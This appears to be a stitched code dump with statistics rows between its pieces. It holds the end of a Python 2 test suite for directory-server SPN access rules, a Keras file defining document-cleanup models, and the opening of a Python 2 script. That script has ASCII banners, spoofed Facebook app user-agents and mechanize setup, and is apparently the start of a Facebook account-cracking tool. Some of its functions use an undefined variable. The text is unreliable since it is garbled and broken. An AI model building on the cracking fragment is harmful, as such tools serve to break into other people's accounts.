self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s" % (ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "DNS/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "RestrictedKrbHost/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "RestrictedKrbHost/%s" %
(ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s._msdcs.%s" %
(ctx.ntds_guid, ctx.dnsdomain))
#the following spns do not match the restrictions and should fail
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/ForestDnsZones.%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/DomainDnsZones.%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "nosuchservice/%s/%s" % ("abcd", "abcd"))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "GC/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "E3514235-4B06-11D1-AB04-00C04FC2DCD2/%s/%s" %
(ctx.ntds_guid, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_computer_spn(self):
# with WP, any value can be set
netbiosdomain = self.dcctx.get_domain_name()
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s/%s" %
(self.computername, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s" % (self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "GC/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s/%s" % (self.computername, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/ForestDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/DomainDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s" % (self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "DNS/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "RestrictedKrbHost/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "RestrictedKrbHost/%s" %
(self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "nosuchservice/%s/%s" % ("abcd", "abcd"))
#user has neither WP nor Validated-SPN, access denied expected
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
mod = "(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace(self.computerdn, mod)
#grant Validated-SPN and check which values are accepted
#see 3.1.1.5.3.1.1.4 servicePrincipalName for reference
# for regular computer objects we shouldalways get constraint violation
# This does not pass against Windows, although it should according to docs
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s" % (self.computername))
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s" %
(self.computername, self.dcctx.dnsdomain))
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "GC/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "ldap/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "ldap/%s.%s/ForestDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_spn_rwdc(self):
self.dc_spn_test(self.dcctx)
def test_spn_rodc(self):
self.dc_spn_test(self.rodcctx)
# Important unit running information
ldb = SamDB(ldaphost, credentials=creds, session_info=system_session(lp), lp=lp)
runner = SubunitTestRunner()
rc = 0
if not runner.run(unittest.makeSuite(AclAddTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclModifyTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclDeleteTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclRenameTests)).wasSuccessful():
rc = 1
# Get the old "dSHeuristics" if it was set
dsheuristics = ldb.get_dsheuristics()
# Set the "dSHeuristics" to activate the correct "userPassword" behaviour
ldb.set_dsheuristics("000000001")
# Get the old "minPwdAge"
minPwdAge = ldb.get_minPwdAge()
# Set it temporarely to "0"
ldb.set_minPwdAge("0")
if not runner.run(unittest.makeSuite(AclCARTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclSearchTests)).wasSuccessful():
rc = 1
# Reset the "dSHeuristics" as they were before
ldb.set_dsheuristics(dsheuristics)
# Reset the "minPwdAge" as it was before
ldb.set_minPwdAge(minPwdAge)
if not runner.run(unittest.makeSuite(AclExtendedTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclSPNTests)).wasSuccessful():
rc = 1
sys.exit(rc)
| 48.773118
| 160
| 0.636886
| 12,445
| 90,718
| 4.407151
| 0.054399
| 0.047095
| 0.044123
| 0.036265
| 0.825423
| 0.798494
| 0.776724
| 0.751053
| 0.739694
| 0.725546
| 0
| 0.024388
| 0.23206
| 90,718
| 1,859
| 161
| 48.799354
| 0.762897
| 0.071298
| 0
| 0.652375
| 0
| 0.001319
| 0.169881
| 0.071802
| 0
| 0
| 0
| 0
| 0.095646
| 0
| null | null | 0.065303
| 0.013852
| null | null | 0.008575
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b14ab5109b8bb6569a3d79067ef8e3b7e5149690
| 11,624
|
py
|
Python
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 7,899
|
2019-12-14T20:39:16.000Z
|
2022-03-31T12:13:27.000Z
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 185
|
2019-07-30T15:33:48.000Z
|
2019-12-12T13:42:01.000Z
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 1,025
|
2019-12-18T06:30:48.000Z
|
2022-03-24T06:55:04.000Z
|
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D, Lambda
import os
import sys
def res_net_block(input_data, filters, conv_size):
x = layers.Conv2D(filters, conv_size, activation=tf.nn.relu6, padding='same',kernel_initializer = 'he_normal')(input_data)
x = layers.BatchNormalization()(x)
x = layers.Conv2D(filters, conv_size, activation=tf.nn.relu6, padding='same',kernel_initializer = 'he_normal')(x)
x = layers.BatchNormalization()(x)
x = layers.Add()([x, input_data])
x = layers.Activation(tf.nn.relu6)(x)
return x
def convert2gray(in_tensor):
out = tf.image.rgb_to_grayscale(in_tensor)
return out
def CreateModel_M16_binary(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = layers.add([shortcut3, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='M16Gray')
return model
def CreateModel_M16_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = layers.add([shortcut3, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='M16Color')
return model
def CreateModel_M32_binary(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = layers.add([shortcut2, out])
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M32_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = layers.add([shortcut2, out])
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M64_binary(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut1 = out
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = layers.add([shortcut1, out])
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut2, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M64_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut1 = out
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = layers.add([shortcut1, out])
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut2, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def GetModel(model_name='M32',gray=True,block_size=(None,None),batch_size=None):
input_shape = (block_size[0],block_size[1],3)
if(model_name=='M64'):
if(gray):
return CreateModel_M64_binary(input_shape,batch_size)
else:
return CreateModel_M64_color(input_shape,batch_size)
elif(model_name=='M32'):
if(gray):
return CreateModel_M32_binary(input_shape,batch_size)
else:
return CreateModel_M32_color(input_shape,batch_size)
else:
if(gray):
return CreateModel_M16_binary(input_shape,batch_size)
else:
return CreateModel_M16_color(input_shape,batch_size)
| 51.662222
| 178
| 0.690898
| 1,644
| 11,624
| 4.694647
| 0.054136
| 0.090956
| 0.093288
| 0.081239
| 0.919409
| 0.89531
| 0.887665
| 0.887536
| 0.869655
| 0.869655
| 0
| 0.036934
| 0.168445
| 11,624
| 224
| 179
| 51.892857
| 0.761535
| 0.033465
| 0
| 0.829016
| 0
| 0
| 0.042553
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046632
| false
| 0
| 0.031088
| 0
| 0.150259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b185bc689ca42d680ac0e7059530294329898a23
| 27,309
|
py
|
Python
|
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;92m
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
██████╗░███████╗░█████╗░██╗░░░░░
██╔══██╗██╔════╝██╔══██╗██║░░░░░
██████╔╝█████╗░░███████║██║░░░░░
██╔══██╗██╔══╝░░██╔══██║██║░░░░░
██║░░██║███████╗██║░░██║███████╗
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
╭┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳╮
┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃
╰┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻╯
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
░██████╗████████╗░█████╗░██████╗░
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
╚█████╗░░░░██║░░░███████║██████╔╝
░╚═══██╗░░░██║░░░██╔══██║██╔══██╗
██████╔╝░░░██║░░░██║░░██║██║░░██║
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
"""
####Logo####
logo1 = """
\033[1;92m
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
██████╗░░█████╗░███╗░░██╗░██████╗░██╗░░░░░░█████╗░
██╔══██╗██╔══██╗████╗░██║██╔════╝░██║░░░░░██╔══██╗
██████╦╝███████║██╔██╗██║██║░░██╗░██║░░░░░███████║
██╔══██╗██╔══██║██║╚████║██║░░╚██╗██║░░░░░██╔══██║
██████╦╝██║░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═════╝░╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
